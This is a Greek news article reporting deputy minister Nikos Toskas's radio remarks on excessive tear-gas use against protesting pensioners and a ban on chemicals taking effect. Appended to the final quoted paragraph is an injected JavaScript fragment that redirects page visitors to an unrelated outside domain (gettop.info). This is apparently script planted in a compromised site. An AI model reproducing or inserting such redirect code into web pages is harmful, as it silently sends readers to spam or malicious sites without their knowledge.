Νίκος Τόσκας: Και εγώ συνταξιούχος είμαι – Η απαγόρευση χημικών ισχύει από σήμερα (ΗΧΗΤΙΚΟ)

0
10

 

«Kαι εγώ συνταξιούχος είμαι, μην νομίζετε ότι δεν συμμεριζόμαστε τα προβλήματα αυτών των ανθρώπων»,τόνισε μεταξύ άλλων σε συνέντευξή του ο Νίκος Τόσκας σχετικά με την ρίψη χημικών στους συνταξιούχους.

Ο αναπληρωτής υπουργός Προστασίας του Πολίτη μιλώντας στον realfm 97.8 τόνισε ότι: « ισχύει από αυτήν τη στιγμή η απαγόρευση χημικών».

Ακούστε αναλυτικά τι δήλωσε ο Νίκος Τόσκας

«Είμαι ξεκάθαρος, δεν έπρεπε να γίνει χρήση δακρυγόνων. Ήταν υπερβολική η χρήση αυτή, γίνεται μόνο σε ακραίες περιπτώσεις. Βέβαια, και με ώθηση να αντιμετωπίσουν αυτούς τους ανθρώπους δεν μπόρεσαν», σημείωσε ο αναπληρωτής υπουργός Προστασίας του Πολίτη.

Κληθείς να σχολιάσει τη δήλωση του Ν. Κακλαμάνη ότι όποιος αναλαμβάνει την πολιτική ευθύνη υποβάλλει και την παραίτησή του, ο αναπληρωτής υπ. Προστασίας του Πολίτη σημείωσε:

«Θα ήθελα να ρωτήσω τους υπουργούς των κυβερνήσεων της ΝΔ και του ΠΑΣΟΚ πόσα δακρυγόνα έπεφταν την εποχή τη δική τους, γιατί έχω μαζί μου τα στατιστικά στοιχεία, τα οποία μιλάνε για γύρω στα 400 φέτος και γύρω στις 4.000 την εποχή τη δική τους».

Παράλληλα πρόσθεσε: «Ούτε ένα δακρυγόνο δεν είναι καλό, γι’ αυτό και πήραμε την απόφαση να μη γίνει άλλη φορά χρήση δακρυγόνων απέναντι σε εργαζόμενους ή συνταξιούχους, με ό,τι κινδύνους αυτό περικλείει». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here